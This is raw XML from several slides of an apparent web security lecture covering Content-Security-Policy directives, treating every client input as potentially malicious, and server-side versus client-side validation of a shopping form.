              </a:rPr>
              <a:t>Browser will not load content from other origins, including inline scripts and HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'self’; image-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cdn.jquery.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser will load images from any origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browsers will execute scripts only from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cdn.jquery.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser will not execute scripts from any other origin, Including inline scripts and HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462075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44030E1-90DD-8F4C-84E3-26377FF44154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Every Input, Every Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434628" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D03DC1-51DF-6D49-87E3-9E3DF4739AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4391826" y="4278335"/>
            <a:ext cx="2743200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F144428-1E1F-8D41-9976-43056A9A97AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7135026" y="3821135"/>
            <a:ext cx="2362200" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="me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en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434630" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0722D5-ECCB-AF4C-A187-1332CE397314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4837112" y="4294783"/>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type="none" w="lg" len="me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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET / HTTP/1.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434637" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C44F11F-69AD-3F4D-9A32-48FDA2617509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7904333" y="5136045"/>
            <a:ext cx="1518970" cy="517526"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFC56AC-7D76-3944-9DF8-0F9D430C2E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8663818" y="3902094"/>
            <a:ext cx="720040" cy="363220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D59510-9AE5-7C4E-A662-512BC53CA89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2004540" y="2698234"/>
            <a:ext cx="7818940" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Every input from the client (URL, request, etc.) is potentially malicious</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD9BA4CC-FC14-914F-88A2-F5B438EBA67C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5816630" y="3455653"/>
            <a:ext cx="351000" cy="646560"/>
            <a:chOff x="3960532" y="2896093"/>
            <a:chExt cx="351000" cy="6465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7D3A0E-E0E8-874D-996B-4C32B7DD4948}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3960532" y="2896093"/>
                <a:ext cx="194760" cy="637200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="4" name="Ink 3">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7D3A0E-E0E8-874D-996B-4C32B7DD4948}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3924892" y="2860093"/>
                  <a:ext cx="26640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0192B53-8614-2B47-A541-44562F5FB4B8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4195972" y="3379933"/>
                <a:ext cx="115560" cy="162720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00192B53-8614-2B47-A541-44562F5FB4B8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4160332" y="3343933"/>
                  <a:ext cx="187200" cy="234360"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A79760-5F2F-4646-AF34-53FCB826C2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067601" y="3429000"/>
            <a:ext cx="713657" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9600" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372262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id="{FC8BB587-94AF-5E46-9C35-D14013695837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1427206" y="3690872"/>
            <a:ext cx="8458200" cy="2524533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Web applications need to reject invalid inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>“Credit card number should be 15 or 16 digits”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>“Expiration date in the past is not valid”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Traditionally done at the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Round-trip communication, increased load</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Better (?) idea: do it in the browser using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client-side JavaScript code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109572" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468AA9FA-8D06-1140-8AD7-7C1630872D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109573" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC6E11E-C1E4-4F45-A910-AE6E8ED211EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1932507"/>
            <a:ext cx="8147223"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663DD74-3064-1D4D-96A5-237FAA0E0099}"/>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8328548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9683A697-5D2C-2842-82D0-3D167608B1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Client-Side Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110596" name="Content Placeholder 7" descr="shopping-benign.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE7C245-8160-9149-9130-24A8CD0BE12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36649" y="1878072"/>
            <a:ext cx="4287847" cy="4203582"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B790AE0C-AC7B-1B4E-94FA-07C26BA6BEA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7070723" y="1598613"/>
            <a:ext cx="2816225" cy="1007086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onSubmit=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   validateCard();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   validateQuantities();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E05D98-8C36-4C47-BF4E-093F1B1ED278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7454103" y="2725453"/>
            <a:ext cx="2211387" cy="39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Validation Ok?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{681A2FDB-A54B-2042-A8E6-879F8A51C915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8728072" y="4454525"/>
            <a:ext cx="1036638" cy="8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80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70B70968-CF68-CB43-8B2D-1956A1ED7EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7486647" y="3182938"/>
            <a:ext cx="723900" cy="1166812"/>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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D301AB1-D9DD-A94E-9159-21B8CA2C2725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7208835" y="3451226"/>
            <a:ext cx="692150" cy="39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008000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
